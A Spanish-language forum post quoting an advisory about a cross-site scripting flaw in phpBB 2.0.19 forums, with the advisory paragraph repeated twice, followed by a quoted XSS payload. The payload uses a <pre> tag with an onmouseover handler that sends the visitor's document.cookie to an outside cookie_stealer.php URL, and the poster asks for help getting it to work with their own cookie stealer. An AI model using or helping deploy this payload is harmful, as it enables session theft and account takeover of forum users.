Sobre el vurnerabilidad xss phpbb 2.0.19:
Citar
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.
use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.
use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.
No se como hacer funcionar el siguiente codigo:
Citar
<pre a=''>'' onmouseover=''document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie'' b=''<pre'' >
http://www.somesite.com/</pre>
http://www.somesite.com/</pre>
Ya se que donde dice la url tengo que remplazarla por un cookie stealer, pero lo intengo y todavía no pillo como hacerlo funcionar!
Bueno es eso, es para aclararme la duda.
Muchas gracias!
Salu2
*info de http://www.milw0rm.com/










Autor


En línea



:shocked:



